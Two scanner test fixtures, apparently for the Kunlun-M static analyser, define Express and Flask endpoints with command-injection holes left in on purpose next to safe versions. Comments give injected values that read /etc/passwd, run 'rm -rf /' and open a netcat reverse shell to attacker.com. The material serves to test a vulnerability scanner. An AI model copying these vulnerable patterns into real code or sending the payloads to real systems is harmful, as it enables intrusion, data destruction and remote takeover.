File: tests/nodejs/realworld_cmd_injection.js
/**
 * Real-world Command Injection test cases for Kunlun-M scanner
 * Tests: exec, execSync, execFile with user-controlled input concatenation
 */

const express = require('express');
const { exec, execSync, execFile } = require('child_process');
const router = express.Router();

// Middleware to parse body
router.use(express.json());
router.use(express.urlencoded({ extended: true }));

/**
 * VULN: Command injection via exec with req.query concatenation
 * Attacker can inject shell metacharacters like ; && || ` etc.
 * Example: /ping?host=127.0.0.1;cat%20/etc/passwd
 */
router.get('/ping', (req, res) => {
    const host = req.query.host;
    exec(`ping -c 3 ${host}`, (err, stdout) => {
        if (err) return res.status(500).send('Error');
        res.send(stdout);
    });
});

/**
 * VULN: Command injection via execSync with req.body concatenation
 * Attacker can inject via the filename parameter
 * Example POST: {"filename": "test.txt; rm -rf /"}
 */
router.post('/backup', (req, res) => {
    const filename = req.body.filename;
    try {
        const output = execSync(`tar -czf /backups/${filename}.tar.gz /data`);
        res.send('Backup created: ' + output.toString());
    } catch (err) {
        res.status(500).send('Backup failed');
    }
});

/**
 * VULN: Command injection via execFile with req.params concatenation
 * execFile with shell: true is also vulnerable
 */
router.get('/diagnose/:hostname', (req, res) => {
    const hostname = req.params.hostname;
    execFile('sh', ['-c', `traceroute ${hostname}`], (err, stdout) => {
        if (err) return res.status(500).send('Diagnosis failed');
        res.send(stdout);
    });
});

/**
 * SAFE: Input validation with allowlist pattern
 * Only allows alphanumeric, dots, and hyphens in hostnames
 */
router.get('/nslookup', (req, res) => {
    const host = req.query.host;
    // SAFE: Strict allowlist validation prevents injection
    const hostnameRegex = /^[a-zA-Z0-9.-]+$/;
    if (!hostnameRegex.test(host)) {
        return res.status(400).send('Invalid hostname');
    }
    exec(`nslookup ${host}`, (err, stdout) => {
        if (err) return res.status(500).send('Lookup failed');
        res.send(stdout);
    });
});

/**
 * SAFE: execFile with array arguments (no shell), input validated
 * execFile without shell does not interpret metacharacters
 */
router.get('/whois/:domain', (req, res) => {
    const domain = req.params.domain;
    const domainRegex = /^[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/;
    if (!domainRegex.test(domain)) {
        return res.status(400).send('Invalid domain');
    }
    // SAFE: Using execFile with argument array avoids shell injection
    execFile('whois', [domain], (err, stdout) => {
        if (err) return res.status(500).send('Whois failed');
        res.send(stdout);
    });
});

module.exports = router;

File: tests/python/realworld_cmd_injection.py
"""
Real-world command injection test cases for Kunlun-M scanner.
Simulates a Flask application with network diagnostic / system admin endpoints.
"""

import os
import shlex
import subprocess
from flask import Blueprint, request, jsonify

admin_bp = Blueprint('admin', __name__)


# ---------------------------------------------------------------------------
# VULN 1: os.system with user-controlled argument concatenation
# ---------------------------------------------------------------------------
@admin_bp.route('/api/admin/ping', methods=['GET'])
def ping_host():
    """Network diagnostic endpoint - allows admin to ping a host."""
    host = request.args.get('host', '127.0.0.1')
    # VULN: User input directly concatenated into shell command
    # Attacker can inject: host="127.0.0.1; cat /etc/passwd"
    os.system(f'ping -c 3 {host}')
    return jsonify({'status': 'done', 'host': host})


# ---------------------------------------------------------------------------
# VULN 2: subprocess.call with shell=True and user input
# ---------------------------------------------------------------------------
@admin_bp.route('/api/admin/dig', methods=['POST'])
def dns_lookup():
    """DNS lookup tool for administrators."""
    domain = request.form.get('domain', '')
    # VULN: subprocess.call with shell=True and string formatting
    # Attacker can inject: domain="google.com; rm -rf /"
    result = subprocess.call(f'dig {domain}', shell=True)
    return jsonify({'result': result, 'domain': domain})


# ---------------------------------------------------------------------------
# VULN 3: os.popen with user-controlled input
# ---------------------------------------------------------------------------
@admin_bp.route('/api/admin/whois', methods=['GET'])
def whois_lookup():
    """WHOIS lookup endpoint."""
    target = request.args.get('target', '')
    # VULN: os.popen with direct string interpolation
    # Attacker can inject: target="example.com | nc attacker.com 4444 -e /bin/bash"
    output = os.popen(f'whois {target}').read()
    return jsonify({'output': output})


# ---------------------------------------------------------------------------
# SAFE 1: shlex.quote properly sanitizes user input
# ---------------------------------------------------------------------------
@admin_bp.route('/api/admin/nslookup', methods=['GET'])
def nslookup():
    """DNS lookup using safe shlex quoting."""
    domain = request.args.get('domain', 'localhost')
    # SAFE: shlex.quote escapes shell metacharacters
    safe_domain = shlex.quote(domain)
    output = subprocess.check_output(
        f'nslookup {safe_domain}', shell=True, text=True
    )
    return jsonify({'output': output})


# ---------------------------------------------------------------------------
# SAFE 2: subprocess with list args (no shell=True)
# ---------------------------------------------------------------------------
@admin_bp.route('/api/admin/traceroute', methods=['POST'])
def traceroute():
    """Traceroute using safe argument list."""
    host = request.form.get('host', '')
    # SAFE: Passing args as list avoids shell injection entirely
    result = subprocess.run(['traceroute', '-w', '2', host], capture_output=True, text=True)
    return jsonify({'output': result.stdout, 'errors': result.stderr})
